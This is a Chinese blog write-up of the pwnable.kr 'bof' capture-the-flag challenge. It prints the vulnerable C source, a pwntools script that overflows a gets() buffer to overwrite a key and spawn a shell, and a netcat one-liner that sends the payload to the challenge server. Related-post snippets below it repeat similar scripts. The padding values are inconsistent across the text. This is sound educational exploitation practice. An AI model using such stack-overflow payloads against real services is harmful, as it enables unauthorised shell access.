pwnable- bof

最新推荐文章于 2024-06-03 14:47:05 发布
最新推荐文章于 2024-06-03 14:47:05 发布
阅读量212 收藏
点赞数
分类专栏: Hacker之路 文章标签: pwnable
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcl2840072208/article/details/93135996
版权

查看程序源码

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
	char overflowme[32];
	printf("overflow me : ");
	gets(overflowme);	// smash me!
	if(key == 0xcafebabe){
		system("/bin/sh");
	}
	else{
		printf("Nah..\n");
	}
}
int main(int argc, char* argv[]){
	func(0xdeadbeef);
	return 0;
}

gdb 反汇编调试
在这里插入图片描述
可以看出 gets 函数从ebp-0xc 处读取数据 , 然后让ebp-0x8 与 0xcafebabe 比较 若相等则执行 system("/bin/sh")

exp

from pwn import * 
sh = process('./bof')
payload = flat(['a'*(0x2c+8) ,0xcafebabe])
sh.sendline(payload)
sh.interactive()

然后我们注入远端服务器
在这里插入图片描述
没有任何返回 , 查阅资料发现
当程序接受到 payload ,执行system("/bin/sh") ,将继续尝试读标准输入, 但是以后没有可以读取的数据 , 所有读取到EOF 然后立即退出,

实际上我们实施栈溢出攻击时, 在exp 会写 sh.interactive() 开启交互模式 , 这里同理, 使用cat 继续从标准输入读取 , 将其发送给程序执行命令。
( printf “\x11\xbe\xba\xfe\xca” ; cat ) | nc pwnable.kr 9000
成功注入

https://stackoverflow.com/questions/54375848/what-is-the-difference-between-python-c-print-and-python-c-print-cat

heri2
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnablebof
qq_43430261的博客
10-18 351
看代码 #include <stdio.h> #include <string.h> #include <stdlib.h> void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key == 0xcafeb...
CS-Situational-Awareness-BOF:使用信标对象文件实现的情境意识命令
02-05
CS-Situational-Awareness-BOF:使用信标对象文件实现的情境意识命令
pwnable-bof
最新发布
wzbzdm的博客
06-03 869
可以看到overflowme的起始地址为0xfffd2e0 + 0xc = 0xfffd2ec。与前面的overflowme位置的差值为0x34即52个字符的长度。那我们需要填充 52个字符串 + 一个int就能成功。可以看出key的地址为 0xfffd320。查看当前目录下的文件,获得flag。连接远程主机并发送payload。通过exit结束调试。
pwnable学习笔记-bof
网安星空
12-21 307
pwn学习,靶场为pwnable.kr,本片内容为bof,即缓冲区溢出
pwnablebof
qq_51979295的博客
09-26 198
栈溢出,给我狠狠地溢出!
pwnable.kr --- bof题解
Yannie's Blog
12-11 1066
题目如下: 我们将文件下载,打开 我们下载完题目中给的两个文件,然后打开bof.c文件,我们可以看到源码: #include &amp;amp;lt;stdio.h&amp;amp;gt; #include &amp;amp;lt;string.h&amp;amp;gt; #include &amp;amp;lt;stdlib.h&amp;amp;gt; void func(int key) { char overflowme[32]; printf(&
pwnable.kr-bof WP
Casuall的博客
03-24 5402
pwnable.kr-bof   这道题是一个简单的缓冲器溢出的题,首先要做这道题要对函数调用栈有一定的了解。 函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶;在函数调用结束时,栈顶的函数(callee)状态被弹出,栈...
pwnable.kr-bof-Writeup
baikeng3674的博客
02-07 163
MarkdownPad Document pwnable.kr-bof-Writeup 在http://pwnable.kr/bin/bof.c得到C代码如下: 1 #include <stdio.h> 2 #include <string.h> 3 #include <stdlib.h> 4 void func(int k...
18.9.17 pwnable.kr----bof - 5 pt
qq_42192672的博客
09-17 156
直接调整ebp,修改renturnaddress,覆盖到key的地址后赋值0xcafebabe就可以了 ebp地址偏移量可一直接在IDA里面看见哟 上脚本 #coding=utf-8 from pwn import * conn=remote("pwnable.kr",9000) payload='a'*52+p32(0xcafebabe) conn.recvuntil('overfl...
pwnable.kr-bof
qq_35661990的博客
09-09 234
#include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; void func(int key){ char overflowme[32]; printf("overflow me : "); gets(overflowme); // smash me! if(key...
CVE-2020-0796-BOF
03-09
CVE-2020-0796-BOF
OSCP-BoF:这是有关了解#OSCP考试中存在的#BoF机器的演练
05-04
触发BoF(这对OSCP有利,因为它们为您提供了代码段) 查找EIP偏移 确认偏移 找到坏蛋 确认错误字符+查找JMP ESP指令 确认代码执行(pop calc) 利用主机 它基于“”项目(顺便说一句,对此进行了令人敬畏的解释)...
CobaltStrike-BOF:信标BOF集合,用于学习窗户和钴击
03-20
CobaltStrike转炉信标转炉的集合。 1)DCOM横向运动一种快速PoC,它通过信标对象文件使用DCOM(ShellWindows)进行横向移动。您可以指定凭据或使用当前用户。...完成后,您可以再次运行BOF,并且信标将
extps-cobalt-strike-bof:扩展流程列表(搜索功能)
05-26
编译 make用法以下命令随附的Aggressor脚本:extps extps proc /用户extps proc用户例如:extps explorer snoom 例如:extps snoom 例如:extps onedrive管理员注意:BOF仅用于64位。例子 beacon> extps explorer[*]...
RSA加密解密算法
just do IT
02-27 2656
1 引言 1.1 任务概要 本次课程设计即完成RSA算法签名验证。 1.1.1 任务要求 (1)产生两个奇数,判断是否是素数。 (2)计算得到n=pq的值和φ(n)的值。 (3)设定加密用的参数e=17,用辗转相除法求得解密用的参数d。 (4)设默认要加密的明文为31631,使用模重复平方法对该明文进行加密和解密。 (5)给出辗转相除法求得解密用的参数d的演示过程,如图16演示。 (6)界面设计友...
xctf - cgfsb
just do IT
07-09 1411
查看程序保护 用IDA 打开 查看24行代码可知,通过修改全局变量pwnme = 8 则结束。 使用gdb 动态调试。 漏洞代码; pwnme 地址, exp: from pwn import * sh = remote('111.198.29.45',36640) sh.recv() sh.sendline('hacker') sh.recv() payload = p32(0x804a...
三个白帽 - pwnme_k0
just do IT
07-11 965
ctf wiki 题目:三个白帽 - pwnme_k0 检查代码保护: 可以看出程序主要开启了 NX 保护以及 Full RELRO 保护。这我们就没有办法修改程序的 got 表了。 运行代码: 猜想代码逻辑,和可能的漏洞。 发现存在有格式化漏洞,而且有两个点。用户名和密码, 用IDA直接分析这部分 IDA分析: 通过覆盖ret地址来执行shellcode, 首先远程服务器默认开启ALRS ...
使用pandas BOF
05-15
在 Pandas 中,BOF 指的是 Business Offset,是一种处理时间序列数据的方法。BOF 提供了一种方便的方法来进行时间聚合,可以帮助我们将时间序列数据按照业务需求进行划分和聚合。 使用 Pandas 的 BOF,需要用到 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值